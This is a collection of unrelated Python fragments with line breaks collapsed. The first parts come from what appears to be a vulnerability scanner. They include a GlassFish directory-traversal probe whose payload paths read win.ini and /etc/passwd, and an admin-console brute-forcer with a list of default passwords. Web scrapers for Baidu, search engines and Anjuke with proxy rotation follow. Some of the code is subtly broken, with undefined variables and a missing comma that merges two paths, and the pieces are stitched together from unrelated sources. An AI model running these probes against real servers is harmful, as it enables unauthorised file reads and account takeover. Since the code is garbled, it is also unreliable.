def request_post(self, url, params, data, flag, success_num, username, password, success, fail, pocs): try: headers = {'User-Agent': get_user_agent()} s = requests.post(url=url + ":" + self.port, data=data, headers=headers, timeout=self.Timeout) for flag in poc["flag"]: if flag in s.text: success_num = success_num + 1 if success_num > 0: if pocs["admin_bursk"] == True: self.vuln.append("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) print("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) else: self.vuln.append(success + " \n pocs: \n" + pocs) print(success + " \n pocs: \n" + pocs) except Exception: success_num = success_num + 1 if success_num <= 2: self.request_post(url, params, data, flag, success_num, username, password, success, fail, pocs)
def query_baidu(term): user_agent = get_user_agent() url = 'https://image.baidu.com/search/flip?tn=baiduimage&ie=utf-8&word=' + term + '&ct=201326592&v=flip' r = requests.get(url, timeout=10, proxies={ 'https': None, 'http': None }, headers={'User-Agent': user_agent}) urls = re.findall('"objURL":"(.*?)",', r.text, re.S) return urls
def request_get(self, url, params, data, flags, success_num, success, fail, pocs): try: headers = get_user_agent() s = requests.get(url=url + ":" + self.port, params=params, headers=headers, timeout=self.Timeout) if not flags: if s.status_code != 404: self.vuln.append(self.url + success) for flag in flags: if flag in s.text: success_num = success_num + 1 if success_num > 0: self.vuln.append(success + " \npocs: \n" + pocs) print(success + " \npocs: \n" + pocs) except Exception: success_num = success_num + 1 if success_num <= 2: self.request_get(url, params, data, flags, success_num, success, fail, pocs)
def glassfish_Directory_traversal(url): #https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 try: headers = {'User-Agent': get_user_agent()} poc = [ "/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", "/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", "/theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", "/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", "/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini", "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/etc/passwd" ] flag = ["[fonts]", "root"] for i in poc: url = url + i s = requests.get(url=url, headers=headers) for j in flag: if j in s.text: return "exist Directory_traversal vuln" return "no exist Directory_traversal vuln" except Exception: return "no exist Directory_traversal vuln"
def glassfish_weak2(host): try: url = "http://%s" % (host) headers = {'User-Agent': get_user_agent()} flag_list = [ 'Just refresh the page... login will take over', 'GlassFish Console - Common Tasks', '/resource/common/js/adminjsf.js">', 'Admin Console</title>', 'src="/homePage.jsf"', 'src="/header.jsf"', 'src="/index.jsf"', '<title>Common Tasks</title>', 'title="Logout from GlassFish' ] user_list = ['admin'] pass_list = [ 'admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root' ] for user in user_list: for password in pass_list: try: PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % ( user, password) res = requests.post(url + '/j_security_check?loginButton=Login', data=PostStr, headers=headers) res_html = res.text except Exception: return "no exist index.jsf GlassFish Weak password" for flag in flag_list: if flag in res_html: info = '%s/index.jsf GlassFish Weak password %s:%s' % ( url, user, password) return 'YES|' + info return "no exist index.jsf GlassFish Weak password" except Exception: return "no exist index.jsf GlassFish Weak password"
scrap_rule=lambda soup: [(a['href'], a.find('div', class_='organic__url-text').text) for a in soup .findAll('a', class_='organic__url', attrs={'data-bem': re.compile('^((?!video).)*$')})]), google=dict( url_pattern=lambda x: f'https://www.google.com/search?q={x}', scrap_rule=lambda soup: [(div.a['href'], div.a.h3) for div in soup.find_all('div', class_='r')]), other=dict( scrap_rule=lambda soup: [(a['href'], a.text) for a in soup.find_all( 'a', href=re.compile('^(http|https)://'))]), ) SEARCH_ENGINE_REQUEST_HEADERS = {'User-Agent': get_user_agent()} logger = logging.getLogger('scrapper') def get_search_url(domain, query): return SCRAPPING_PREFERENCES[domain]['url_pattern'](query) def get_scrapping_func(domain='other'): return SCRAPPING_PREFERENCES[domain]['scrap_rule'] def get_links(url, scrapping_rule): """Getting search result page html code """
import random import re import requests import xlwt from user_agent import get_user_agent from 代理66 import get_ips book = xlwt.Workbook(encoding='utf-8') sheet = book.add_sheet("安居客", cell_overwrite_ok=True) headers = { 'user-agent': random.choice(get_user_agent()), 'Accept-Encoding': 'gzip, deflate', 'referer': 'https://shanghai.anjuke.com/', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', } ip_list = get_ips() ##请求网站信息 def req(): response = requests.get('https://sh.fang.anjuke.com/', headers=headers, proxies=random.choice(ip_list)) ##加请求头,更换ip, return response #解析网站 def crawl():